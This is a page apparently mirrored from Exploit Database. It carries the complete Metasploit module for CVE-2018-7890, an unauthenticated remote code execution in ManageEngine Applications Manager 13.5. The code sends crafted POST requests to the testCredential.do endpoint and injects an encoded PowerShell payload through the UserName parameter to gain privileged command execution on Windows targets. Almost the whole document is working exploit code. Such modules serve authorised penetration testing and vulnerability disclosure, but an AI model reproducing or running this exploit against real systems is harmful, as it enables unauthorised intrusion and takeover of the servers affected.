ManageEngine Applications Manager 13.5 – Remote Code Execution (Metasploit)

• Exploit Database
• 18 阅读

• 作者： Mehmet Ince
  日期： 2018-03-12
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/44274/

• ##
  # This module requires Metasploit: http://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Powershell
  
  def initialize(info={})
  super(update_info(info,
  'Name' => "ManageEngine Applications Manager Remote Code Execution",
  'Description'=> %q{
  This module exploits command injection vulnerability in the ManageEngine Application Manager product.
  An unauthenticated user can execute a operating system command under the context of privileged user.
  
  Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials
  by accessing given system. This endpoint calls a several internal classes and then executes powershell script
  without validating user supplied parameter when the given system is OfficeSharePointServer.
  },
  'License'=> MSF_LICENSE,
  'Author' =>
  [
  'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
  ],
  'References' =>
  [
  ['CVE', '2018-7890'],
  ['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/']
  ],
  'DefaultOptions'=>
  {
  'WfsDelay' => 10,
  'RPORT' => 9090
  },
  'Payload' =>
  {
  'BadChars' => "\x22"
  },
  'Platform' => ['win'],
  'Arch' => [ ARCH_X86, ARCH_X64 ],
  'Targets' => [ ['Automatic', {}] ],
  'Privileged' => true,
  'DisclosureDate' => 'Mar 7 2018',
  'DefaultTarget'=> 0
  ))
  
  register_options(
  [
  OptString.new('TARGETURI', [true, 'The URI of the application', '/'])
  ]
  )
  end
  
  def check
  res = send_request_cgi({
  'method' => 'POST',
  'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
  'vars_post' => {
  'method' => 'testCredentialForConfMonitors',
  'type' => 'OfficeSharePointServer',
  'montype' => 'OfficeSharePointServer',
  'isAgentEnabled' => 'NO',
  'isAgentAssociated' => 'false',
  'displayname' => Rex::Text.rand_text_alpha(10),
  'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
  'Version' => '2013',
  'Powershell' => 'True', # :-)
  'CredSSP' => 'False',
  'SPType' => 'SPServer',
  'CredentialDetails' => 'nocm',
  'Password' => Rex::Text.rand_text_alpha(3),
  'UserName' => Rex::Text.rand_text_alpha(3)
  }
  })
  if res && res.body.include?('Kindly check the credentials and try again')
  Exploit::CheckCode::Vulnerable
  else
  Exploit::CheckCode::Safe
  end
  end
  
  def exploit
  
  powershell_options = {
  encode_final_payload: true,
  remove_comspec: true
  }
  p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)
  
  print_status('Triggering the vulnerability')
  
  send_request_cgi({
  'method' => 'POST',
  'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
  'vars_post' => {
  'method' => 'testCredentialForConfMonitors',
  'type' => 'OfficeSharePointServer',
  'montype' => 'OfficeSharePointServer',
  'isAgentEnabled' => 'NO',
  'isAgentAssociated' => 'false',
  'displayname' => Rex::Text.rand_text_alpha(10),
  'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
  'Version' => '2013',
  'Powershell' => 'True', # :-)
  'CredSSP' => 'False',
  'SPType' => 'SPServer',
  'CredentialDetails' => 'nocm',
  'Password' => Rex::Text.rand_text_alpha(3),
  'UserName' => "$(#{p})"
  }
  })
  
  end
  end